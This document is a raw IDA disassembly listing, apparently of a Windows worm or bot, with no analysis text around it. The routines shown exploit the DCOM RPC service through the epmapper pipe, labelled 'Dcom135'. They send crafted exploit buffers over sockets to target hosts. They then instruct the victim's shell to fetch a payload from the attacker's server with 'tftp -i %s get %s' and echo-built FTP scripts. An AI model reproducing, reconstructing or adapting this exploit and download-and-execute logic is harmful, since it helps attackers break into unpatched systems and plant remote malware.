lea eax, dword_428C00[eax]
loc_4039E6: ; CODE XREF: sub_40381E+15E�j
push 1
pop eax
loc_4039E9: ; CODE XREF: sub_40381E+FF�j
pop edi
pop esi
pop ebx
leave
retn
sub_40381E endp
; ---------------------------------------------------------------------------
push ebx
push esi
push edi
lea esi, [esp+10h]
sub esp, 0BCh
mov dword ptr [esp+16Ch], 87h
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_403E35
push 2Fh
lea esi, [esp+0D0h]
pop ecx
mov dword ptr [esp+16Ch], 1BDh
mov edi, esp
mov ebx, eax
rep movsd
call sub_404737
add esp, 0BCh
test ebx, ebx
jnz short loc_403A40
test eax, eax
jz short loc_403A43
loc_403A40: ; CODE XREF: ___:00403A3A�j
push 1
pop eax
loc_403A43: ; CODE XREF: ___:00403A3E�j
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A47 proc near ; CODE XREF: sub_403E35+28�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, offset off_426068
lea edi, [ebp+var_C]
mov ecx, 8Ah
movsd
movsd
movsd
mov esi, offset off_426060
lea edi, [ebp+var_354]
movsd
movsw
xor eax, eax
lea edi, [ebp+var_34E]
rep stosd
stosw
mov al, byte_43C63C
push 45h
mov [ebp+var_124], al
pop ecx
xor eax, eax
lea edi, [ebp+var_123]
rep stosd
stosw
stosb
lea eax, [ebp+var_124]
push 0FFh
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
xor edi, edi
push edi
push edi
nop
call near ptr 7C809BF8h
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_417B9F
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_417B9F
mov esi, [ebp+arg_4]
lea eax, [ebp+var_354]
add esp, 10h
mov [esi+14h], eax
mov eax, offset dword_43C638
push edi
push eax
push eax
push esi
mov [esi+4], edi
mov [esi+10h], edi
mov [esi+1Ch], edi
call dword_441458
cmp eax, 5
mov ebx, 4C3h
jz short loc_403B0B
cmp eax, ebx
jnz short loc_403B15
loc_403B0B: ; CODE XREF: sub_403A47+BE�j
push edi
push edi
push edi
push esi
call dword_441458
loc_403B15: ; CODE XREF: sub_403A47+C2�j
cmp eax, 5
jz short loc_403B23
cmp eax, ebx
jz short loc_403B23
push 1
pop eax
jmp short loc_403B25
; ---------------------------------------------------------------------------
loc_403B23: ; CODE XREF: sub_403A47+D1�j
; sub_403A47+D5�j
xor eax, eax
loc_403B25: ; CODE XREF: sub_403A47+DA�j
pop edi
pop esi
pop ebx
leave
retn
sub_403A47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B2A proc near ; CODE XREF: sub_403E35+7A�p
; sub_403E35+15A�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 354h
push esi
push edi
mov esi, offset off_426068
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset off_426060
lea edi, [ebp+var_354]
movsd
movsw
mov ecx, 8Ah
xor eax, eax
lea edi, [ebp+var_34E]
push 45h
rep stosd
stosw
mov al, byte_43C63C
pop ecx
mov [ebp+var_124], al
xor eax, eax
lea edi, [ebp+var_123]
push 0FFh
rep stosd
stosw
stosb
lea eax, [ebp+var_124]
xor esi, esi
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push esi
nop
call near ptr 7C809BF8h
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_417B9F
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_417B9F
add esp, 10h
loc_403BBB: ; CODE XREF: sub_403B2A+AF�j
push esi
lea eax, [ebp+var_354]
push esi
push eax
call dword_4412F8
test eax, eax
jz short loc_403BDB
push 7D0h
nop
call near ptr 7C802442h
jmp short loc_403BBB
; ---------------------------------------------------------------------------
loc_403BDB: ; CODE XREF: sub_403B2A+A2�j
push 1
pop eax
pop edi
pop esi
leave
retn
sub_403B2A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BE2 proc near ; CODE XREF: sub_403E35+A9�p
; sub_403E35+1E7�p
var_3004 = byte ptr -3004h
var_2004 = byte ptr -2004h
var_1FE0 = byte ptr -1FE0h
var_1FD4 = byte ptr -1FD4h
var_1F2D = byte ptr -1F2Dh
var_1004 = byte ptr -1004h
var_FFC = dword ptr -0FFCh
var_FF4 = dword ptr -0FF4h
var_F84 = dword ptr -0F84h
var_F80 = dword ptr -0F80h
var_F50 = dword ptr -0F50h
var_F4C = dword ptr -0F4Ch
var_F34 = dword ptr -0F34h
var_E78 = dword ptr -0E78h
var_CA4 = dword ptr -0CA4h
var_C9C = dword ptr -0C9Ch
var_C94 = byte ptr -0C94h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 3004h
call sub_417B70
push esi
push edi
push offset byte_42EDC4
mov esi, 0A7h
push [ebp+arg_0]
mov [ebp+var_4], esi
call sub_40AFAB
pop ecx
push eax
lea eax, [ebp+var_3004]
push 1000h
push eax
call sub_416CC9
mov edi, eax
add esp, 10h
test edi, edi
jz loc_403E31
push ebx
mov ebx, offset off_425F7C
push 30h
lea eax, [ebp+var_2004]
push ebx
push eax
call sub_417490
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_417430
lea eax, [ebp+var_3004]
push edi
push eax
lea eax, [ebp+var_1F2D]
push eax
call sub_417490
add esp, 24h
lea esi, [edi+0D7h]
loc_403C67: ; CODE XREF: sub_403BE2+D3�j
mov eax, esi
push 10h
cdq
pop ecx
idiv ecx
cmp edx, 0Ch
jz short loc_403CB7
mov esi, [ebp+var_4]
push 30h
lea eax, [ebp+var_2004]
inc esi
push ebx
push eax
mov [ebp+var_4], esi
call sub_417490
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_417430
lea eax, [ebp+var_3004]
push edi
push eax
lea eax, [ebp+esi+var_1FD4]
push eax
call sub_417490
add esp, 24h
lea esi, [esi+edi+30h]
jmp short loc_403C67
; ---------------------------------------------------------------------------
loc_403CB7: ; CODE XREF: sub_403BE2+90�j
cmp [ebp+arg_C4], 0
jz short loc_403CD2
cmp [ebp+arg_C0], 3
jz short loc_403CDB
cmp [ebp+arg_C0], 0
jmp short loc_403CD9
; ---------------------------------------------------------------------------
loc_403CD2: ; CODE XREF: sub_403BE2+DC�j
cmp [ebp+arg_C0], 3
loc_403CD9: ; CODE XREF: sub_403BE2+EE�j
jnz short loc_403CE4
loc_403CDB: ; CODE XREF: sub_403BE2+E5�j
push 4
push offset dword_42605C
jmp short loc_403CEB
; ---------------------------------------------------------------------------
loc_403CE4: ; CODE XREF: sub_403BE2:loc_403CD9�j
push 4
push offset dword_426058
loc_403CEB: ; CODE XREF: sub_403BE2+100�j
lea eax, [ebp+var_1FE0]
push eax
call sub_417490
add esp, 0Ch
lea eax, [ebp+var_1004]
push 360h
push offset dword_425B90
push eax
call sub_417490
push 10h
lea eax, [ebp+var_CA4]
push offset dword_425EF4
push eax
call sub_417490
lea eax, [ebp+var_2004]
push esi
push eax
lea eax, [ebp+var_C94]
push eax
call sub_417490
lea edi, [esi+370h]
push 3Ch
push offset off_425F08
lea eax, [ebp+edi+var_1004]
push eax
call sub_417490
add edi, 3Ch
push 30h
push offset dword_425F48
lea eax, [ebp+edi+var_1004]
push eax
call sub_417490
mov eax, esi
add edi, 30h
cdq
sub eax, edx
sar eax, 1
add [ebp+var_CA4], eax
add [ebp+var_C9C], eax
mov eax, [ebp+var_FFC]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FFC], eax
mov eax, [ebp+var_FF4]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FF4], eax
mov eax, [ebp+var_F84]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F84], eax
mov eax, [ebp+var_F80]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F80], eax
mov eax, [ebp+var_F50]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F50], eax
mov eax, [ebp+var_F4C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F4C], eax
mov eax, [ebp+var_F34]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F34], eax
mov eax, [ebp+var_E78]
lea eax, [eax+esi-0Ch]
lea esi, [edi+1]
push esi
mov [ebp+var_E78], eax
call sub_417BEE
add esp, 40h
mov ebx, eax
push esi
push 0
push ebx
call sub_417430
lea eax, [ebp+var_1004]
push edi
push eax
push ebx
call sub_417490
mov eax, [ebp+arg_BC]
add esp, 18h
mov [eax], edi
mov eax, ebx
pop ebx
loc_403E31: ; CODE XREF: sub_403BE2+3E�j
pop edi
pop esi
leave
retn
sub_403BE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E35 proc near ; CODE XREF: ___:00403A0D�p
; sub_4076D2+1E6�p
; DATA XREF: ...
var_1338 = byte ptr -1338h
var_338 = byte ptr -338h
var_234 = byte ptr -234h
var_34 = byte ptr -34h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_B0 = dword ptr 0B8h
arg_B4 = dword ptr 0BCh
push ebp
mov ebp, esp
mov eax, 1338h
call sub_417B70
cmp [ebp+arg_A0], 1BDh
push ebx
push esi
push edi
jnz loc_403FA3
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+arg_4]
push eax
call sub_403A47
pop ecx
test eax, eax
pop ecx
jz loc_4040B3
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_338]
push offset aSPipeEpmapper ; "\\\\%s\\pipe\\epmapper"
push eax
call sub_4173AC
add esp, 0Ch
xor ebx, ebx
lea eax, [ebp+var_338]
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
push eax
nop
call near ptr 7C801A24h
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_403EBA
loc_403EAB: ; CODE XREF: sub_403E35+126�j
lea eax, [ebp+arg_4]
push eax
call sub_403B2A
pop ecx
jmp loc_4040B3
; ---------------------------------------------------------------------------
loc_403EBA: ; CODE XREF: sub_403E35+74�j
lea eax, [ebp+arg_4]
push 2
push eax
call sub_40DA5C
pop ecx
lea esi, [ebp+arg_0]
pop ecx
push 1
push eax
lea eax, [ebp+var_10]
push eax
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_403BE2
add esp, 0C8h
cmp eax, ebx
mov [ebp+var_8], eax
jz short loc_403F52
mov edi, 186A0h
push edi
call sub_417BEE
mov esi, eax
push edi
push ebx
push esi
call sub_417430
add esp, 10h
lea eax, [ebp+var_C]
mov edi, 2710h
push ebx
push eax
push edi
push esi
push 48h
push offset dword_425B44
push [ebp+var_4]
nop
call near ptr 7C8312E5h
cmp byte ptr [esi+2], 0Ch
jnz short loc_403F42
lea eax, [ebp+var_14]
push ebx
push eax
push [ebp+var_10]
push [ebp+var_8]
push [ebp+var_4]
nop
call near ptr 7C810D87h
test eax, eax
jnz short loc_403F60
loc_403F42: ; CODE XREF: sub_403E35+F3�j
push esi
call sub_417C62
push [ebp+var_8]
call sub_417C62
pop ecx
pop ecx
loc_403F52: ; CODE XREF: sub_403E35+B9�j
push [ebp+var_4]
nop
call near ptr 7C809B47h
jmp loc_403EAB
; ---------------------------------------------------------------------------
loc_403F60: ; CODE XREF: sub_403E35+10B�j
lea eax, [ebp+var_C]
push ebx
push eax
push edi
push esi
push [ebp+var_4]
nop
call near ptr 7C80180Eh
push [ebp+var_8]
mov edi, eax
call sub_417C62
push esi
call sub_417C62
pop ecx
pop ecx
push [ebp+var_4]
nop
call near ptr 7C809B47h
lea eax, [ebp+arg_4]
push eax
call sub_403B2A
cmp edi, 1
pop ecx
jnz loc_4040C7
jmp loc_4040B3
; ---------------------------------------------------------------------------
loc_403FA3: ; CODE XREF: sub_403E35+1A�j
lea eax, [ebp+arg_4]
push 1
push eax
call sub_40DA5C
mov esi, eax
pop ecx
cmp esi, 1
pop ecx
jz loc_4040B3
xor ebx, ebx
push ebx
push 1
push 2
call dword_441438 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_4040B3
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_417430
add esp, 0Ch
mov [ebp+var_24], 2
push [ebp+arg_A0]
call dword_4413B8 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+arg_4]
push eax
call dword_4413F8 ; inet_addr
mov [ebp+var_20], eax
push ebx
lea eax, [ebp+var_C]
push esi
push eax
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_403BE2
mov esi, eax
add esp, 0C8h
cmp esi, ebx
mov [ebp+var_8], esi
jnz short loc_404035
push [ebp+var_4]
jmp short loc_4040AD
; ---------------------------------------------------------------------------
loc_404035: ; CODE XREF: sub_403E35+1F9�j
mov edi, [ebp+var_4]
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_441360 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40404D
loc_40404A: ; CODE XREF: sub_403E35+22A�j
push esi
jmp short loc_4040A6
; ---------------------------------------------------------------------------
loc_40404D: ; CODE XREF: sub_403E35+213�j
push ebx
push 48h
push offset dword_425B44
push edi
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40404A
mov esi, 1000h
push ebx
lea eax, [ebp+var_1338]
push esi
push eax
push edi
call dword_4413D0 ; recv
push ebx
push [ebp+var_C]
push [ebp+var_8]
push edi
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40408E
push [ebp+var_8]
jmp short loc_4040A6
; ---------------------------------------------------------------------------
loc_40408E: ; CODE XREF: sub_403E35+252�j
push ebx
lea eax, [ebp+var_1338]
push esi
push eax
push edi
call dword_4413D0 ; recv
push [ebp+var_8]
cmp eax, 0FFFFFFFFh
jnz short loc_4040BA
loc_4040A6: ; CODE XREF: sub_403E35+216�j
; sub_403E35+257�j
call sub_417C62
pop ecx
push edi
loc_4040AD: ; CODE XREF: sub_403E35+1FE�j
call dword_441450 ; closesocket
loc_4040B3: ; CODE XREF: sub_403E35+31�j
; sub_403E35+80�j ...
xor eax, eax
jmp loc_404176
; ---------------------------------------------------------------------------
loc_4040BA: ; CODE XREF: sub_403E35+26F�j
call sub_417C62
pop ecx
push edi
call dword_441450 ; closesocket
loc_4040C7: ; CODE XREF: sub_403E35+163�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_234]
push offset unk_4260A0
push eax
call sub_4173AC
add esp, 0Ch
xor esi, esi
loc_4040E1: ; CODE XREF: sub_403E35+2CC�j
lea eax, [ebp+var_234]
push eax
call sub_40C5D7
test eax, eax
pop ecx
jnz short loc_404105
push 1388h
nop
call near ptr 7C802442h
inc esi
cmp esi, 6
jl short loc_4040E1
jmp short loc_404173
; ---------------------------------------------------------------------------
loc_404105: ; CODE XREF: sub_403E35+2BB�j
lea eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_A8]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
lea eax, [ebp+var_234]
push offset unk_426074
push eax
call sub_4173AC
add esp, 10h
cmp [ebp+arg_B4], ebx
jnz short loc_404151
push ebx
lea eax, [ebp+var_234]
push [ebp+arg_B0]
push eax
lea eax, [ebp+arg_14]
push eax
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
loc_404151: ; CODE XREF: sub_403E35+2FD�j
lea eax, [ebp+var_234]
push eax
call sub_40C4F7
mov eax, [ebp+arg_A8]
pop ecx
imul eax, 3Ch
inc dword_428C00[eax]
lea eax, dword_428C00[eax]
loc_404173: ; CODE XREF: sub_403E35+2CE�j
push 1
pop eax
loc_404176: ; CODE XREF: sub_403E35+280�j
pop edi
pop esi
pop ebx
leave
retn
sub_403E35 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40417B proc near ; DATA XREF: ___:00423004�o
jmp $+5
sub_40417B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404180 proc near
push 0BB80h
push 76Ch
call sub_415EF7
pop ecx
mov dword_43C640, eax
pop ecx
retn
sub_404180 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404197 proc near ; CODE XREF: sub_4042F8+42A�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_417430
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call dword_4413F8 ; inet_addr
mov [ebp+var_C], eax
mov ax, word ptr dword_43C640
push eax
call dword_4413B8 ; ntohs
push esi
push 1
push 2
mov [ebp+var_E], ax
call dword_441438 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_4042D1
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call dword_441360 ; connect
cmp eax, 0FFFFFFFFh
jz loc_4042D1
push esi
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call dword_4413D0 ; recv
mov esi, offset byte_42EDC4
push esi
push esi
push [ebp+arg_0]
call sub_40AFAB
pop ecx
mov edi, 190h
push eax
push offset aTftpISGetS ; "tftp -i %s get %s\r\n"
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41792A
add esp, 18h
push esi
push esi
push dword_43C64C
push [ebp+arg_0]
call sub_40AFAB
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41792A
add esp, 1Ch
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4042D1
push 1F4h
nop
call near ptr 7C802442h
push esi
push offset dword_425A78
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41792A
add esp, 10h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4042D5
loc_4042D1: ; CODE XREF: sub_404197+51�j
; sub_404197+67�j ...
xor al, al
jmp short loc_4042F3
; ---------------------------------------------------------------------------
loc_4042D5: ; CODE XREF: sub_404197+138�j
push 0
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call dword_4413D0 ; recv
push ebx
call dword_441450 ; closesocket
mov al, 1
loc_4042F3: ; CODE XREF: sub_404197+13C�j
pop edi
pop esi
pop ebx
leave
retn
sub_404197 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4042F8 proc near ; CODE XREF: sub_404737+125�p
; sub_404737+147�p
var_89B4 = byte ptr -89B4h
var_894C = byte ptr -894Ch
var_68DC = byte ptr -68DCh
var_686C = byte ptr -686Ch
var_5DA8 = byte ptr -5DA8h
var_4804 = byte ptr -4804h
var_4803 = byte ptr -4803h
var_3770 = byte ptr -3770h
var_2CAC = byte ptr -2CACh
var_2CAB = byte ptr -2CABh
var_2CA8 = byte ptr -2CA8h
var_2C2C = byte ptr -2C2Ch
var_245C = byte ptr -245Ch
var_1FB1 = byte ptr -1FB1h
var_1CC4 = byte ptr -1CC4h
var_14E0 = byte ptr -14E0h
var_14D0 = byte ptr -14D0h
var_11AC = byte ptr -11ACh
var_11A8 = byte ptr -11A8h
var_119C = byte ptr -119Ch
var_F14 = byte ptr -0F14h
var_E74 = byte ptr -0E74h
var_768 = dword ptr -768h
var_758 = byte ptr -758h
var_744 = byte ptr -744h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B4h
call sub_417B70
mov eax, dword_425AF8
push ebx
mov [ebp+var_10], eax
mov eax, dword_425AFC
mov [ebp+var_C], eax
push esi
lea eax, [ebp+arg_4]
push edi
push eax
lea eax, [ebp+var_3C]
push offset loc_425AEC
push eax
call sub_4173AC
add esp, 0Ch
xor ebx, ebx
xor esi, esi
lea eax, [ebp+var_103]
loc_404337: ; CODE XREF: sub_4042F8+4E�j
mov cl, [ebp+esi+var_3C]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, 28h
jl short loc_404337
push 60h
lea eax, [ebp+var_B4]
push offset dword_4265E0
push eax
call sub_417490
lea eax, [ebp+var_3C]
push eax
call sub_417AF0
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_417490
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC_0+3)
push eax
call sub_417AF0
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_417490
lea eax, [ebp+var_3C]
push eax
call sub_417AF0
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_417490
lea eax, [ebp+var_3C]
push eax
call sub_417AF0
shl al, 1
add al, 9
push 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_87]
push eax
call sub_417490
mov ax, word ptr dword_43C640
add esp, 2Ch
push eax
call dword_4413B8 ; ntohs
xor eax, 9999h
push 2
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push offset dword_4262E0
call sub_417490
add esp, 0Ch
cmp [ebp+arg_C0], ebx
jz loc_4044F4
mov edi, 0DACh
lea eax, [ebp+var_1CC4]
push edi
push 90h
push eax
call sub_417430
mov eax, [ebp+arg_C0]
push 4
imul eax, 3Ch
lea eax, dword_426A08[eax]
mov [ebp+var_14], eax
push eax
lea eax, [ebp+var_14E0]
push eax
call sub_417490
mov esi, offset loc_426230
push esi
call sub_417AF0
push eax
lea eax, [ebp+var_14D0]
push esi
push eax
call sub_417490
push 4
lea eax, [ebp+var_11AC]
push offset loc_425AE4
push eax
call sub_417490
push 4
lea eax, [ebp+var_11A8]
push [ebp+var_14]
push eax
call sub_417490
add esp, 40h
push esi
call sub_417AF0
push eax
lea eax, [ebp+var_119C]
push esi
push eax
call sub_417490
add esp, 10h
xor esi, esi
lea eax, [ebp+var_4803]
loc_4044AD: ; CODE XREF: sub_4042F8+1C6�j
mov cl, [ebp+esi+var_1CC4]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, edi
jl short loc_4044AD
mov esi, 1C52h
lea eax, [ebp+var_89B4]
push esi
push 31h
push eax
mov [ebp+var_2CAC], bl
mov [ebp+var_2CAB], bl
call sub_417430
push esi
lea eax, [ebp+var_68DC]
push 31h
push eax
call sub_417430
add esp, 18h
jmp short loc_40454B
; ---------------------------------------------------------------------------
loc_4044F4: ; CODE XREF: sub_4042F8+118�j
push 7D0h
lea eax, [ebp+var_F14]
push 90h
push eax
call sub_417430
mov esi, offset loc_426230
push esi
call sub_417AF0
push eax
lea eax, [ebp+var_E74]
push esi
push eax
call sub_417490
lea eax, [ebp+var_10]
push eax
call sub_417AF0
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_758]
push eax
call sub_417490
mov eax, dword_426A08
add esp, 2Ch
mov [ebp+var_768], eax
loc_40454B: ; CODE XREF: sub_4042F8+1FA�j
push 0E29h
lea eax, [ebp+var_2CA8]
push 31h
push eax
call sub_417430
movsx eax, [ebp+var_1]
mov edi, [ebp+arg_BC]
add esp, 0Ch
add eax, 4
push ebx
push eax
lea eax, [ebp+var_B4]
push eax
push edi
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40458A
loc_404583: ; CODE XREF: sub_4042F8+2B9�j
; sub_4042F8+2E0�j ...
xor al, al
jmp loc_404732
; ---------------------------------------------------------------------------
loc_40458A: ; CODE XREF: sub_4042F8+289�j
mov esi, 640h
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_4413D0 ; recv
push ebx
push 68h
push offset dword_426644
push edi
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jz short loc_404583
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_4413D0 ; recv
push ebx
push 0A0h
push offset dword_4266B0
push edi
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jz short loc_404583
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_4413D0 ; recv
cmp [ebp+arg_C0], ebx
jz loc_4046A0
push 68h
lea eax, [ebp+var_89B4]
push offset dword_426868
push eax
call sub_417490
lea eax, [ebp+var_4804]
push 1B5Ah
push eax
lea eax, [ebp+var_894C]
push eax
call sub_417490
push 70h
lea eax, [ebp+var_68DC]
push offset dword_4268D4
push eax
call sub_417490
lea eax, [ebp+var_3770]
push 0A5Eh
push eax
lea eax, [ebp+var_686C]
push eax
call sub_417490
push 84h
lea eax, [ebp+var_5DA8]
push offset dword_426948
push eax
call sub_417490
add esp, 3Ch
lea eax, [ebp+var_89B4]
push ebx
push 10FCh
push eax
push edi
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jz loc_404583
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_4413D0 ; recv
push ebx
push 0FDCh
lea eax, [ebp+var_68DC]
jmp short loc_4046F6
; ---------------------------------------------------------------------------
loc_4046A0: ; CODE XREF: sub_4042F8+2F8�j
push 7Ch
lea eax, [ebp+var_2CA8]
push offset dword_426754
push eax
call sub_417490
lea eax, [ebp+var_F14]
push 7D0h
push eax
lea eax, [ebp+var_2C2C]
push eax
call sub_417490
push 90h
lea eax, [ebp+var_245C]
push offset off_4267D4
push eax
call sub_417490
add esp, 24h
mov [ebp+var_1FB1], bl
lea eax, [ebp+var_2CA8]
push ebx
push 0CF8h
loc_4046F6: ; CODE XREF: sub_4042F8+3A6�j
push eax
push edi
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jz loc_404583
push 12Ch
nop
call near ptr 7C802442h
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_404197
add esp, 0BCh
test al, al
setnz al
loc_404732: ; CODE XREF: sub_4042F8+28D�j
pop edi
pop esi
pop ebx
leave
retn
sub_4042F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404737 proc near ; CODE XREF: ___:00403A2D�p
; ___:0040494D�p ...
var_854 = byte ptr -854h
var_810 = byte ptr -810h
var_214 = byte ptr -214h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_B0 = dword ptr 0B8h
push ebp
mov ebp, esp
sub esp, 854h
push ebx
push esi
push edi
push 0BB80h
push 76Ch
call sub_415EF7
xor edi, edi
push 10h
lea eax, [ebp+var_14]
push edi
push eax
mov [ebp+var_4], edi
call sub_417430
add esp, 14h
lea eax, [ebp+arg_4]
mov [ebp+var_14], 2
push eax
call dword_4413F8 ; inet_addr
push [ebp+arg_A0]
mov [ebp+var_10], eax
call dword_4413B8 ; ntohs
push 6
push 1
push 2
mov [ebp+var_12], ax
call dword_441438 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40483F
lea eax, [ebp+var_14]
push 10h
push eax
push ebx
call dword_441360 ; connect
cmp eax, 0FFFFFFFFh
jz loc_40483F
push edi
push 89h
push offset dword_4263C8
push ebx
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40483F
mov esi, 640h
push edi
lea eax, [ebp+var_854]
push esi
push eax
push ebx
call dword_4413D0 ; recv
push edi
push 0A8h
push offset dword_426454
push ebx
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40483F
push edi
lea eax, [ebp+var_854]
push esi
push eax
push ebx
call dword_4413D0 ; recv
push edi
push 0DEh
push offset dword_426500
push ebx
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40483F
push edi
lea eax, [ebp+var_854]
push esi
push eax
push ebx
call dword_4413D0 ; recv
movsx eax, [ebp+var_810]
sub eax, 30h
jz short loc_404849
dec eax
jz short loc_404846
